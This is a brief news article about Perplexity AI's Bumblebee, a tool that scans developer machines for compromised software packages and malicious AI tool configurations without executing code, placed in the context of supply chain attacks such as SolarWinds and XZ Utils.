Perplexity Built a Tool That Checks Your Computer for Infected Software—Without Setting Off the Infection

Perplexity AI has released Bumblebee, a security scanning tool designed to detect compromised software packages and malicious AI tool configurations on developer machines without executing the potentially dangerous code.

The tool addresses a critical gap in supply chain security. Developers often install third-party packages from repositories like npm and PyPI, where bad actors can inject malicious code. Traditional antivirus and malware detection tools require running code to analyze it, creating a catch-22: you need to execute the software to find threats, but execution itself poses infection risk.

Bumblebee solves this by analyzing package metadata, file structures, and configuration files without running any code. It scans for behavioral signatures, suspicious file patterns, and known indicators of compromise. The tool specifically targets AI tool configurations, recognizing that large language model setup files and API credentials represent a unique attack surface for threat actors seeking to exploit generative AI infrastructure.

The release reflects growing concerns about software supply chain attacks. High-profile incidents like the SolarWinds breach and XZ Utils backdoor have demonstrated how compromised dependencies can spread across thousands of organizations. For developers working with AI tools, the stakes are even higher. Compromised LLM configurations could expose API keys, exfiltrate training data, or insert malicious prompts into AI systems.

Perplexity positions Bumblebee as a proactive defense layer. Rather than waiting for malware to execute, developers can run the scanner before installing new packages or pulling in dependencies. The tool integrates with developer workflows, flagging suspicious packages during the review stage.

The move underscores how AI companies are increasingly investing in security infrastructure. As AI tools become embedded in production systems, threats targeting these tools escalate. Bumblebee won't catch every attack, but it raises the bar for adversaries attempting supply chain compromise. For developers managing complex dependency chains and AI integrations, the tool offers practical defense without the performance overhead of traditional runtime scanning.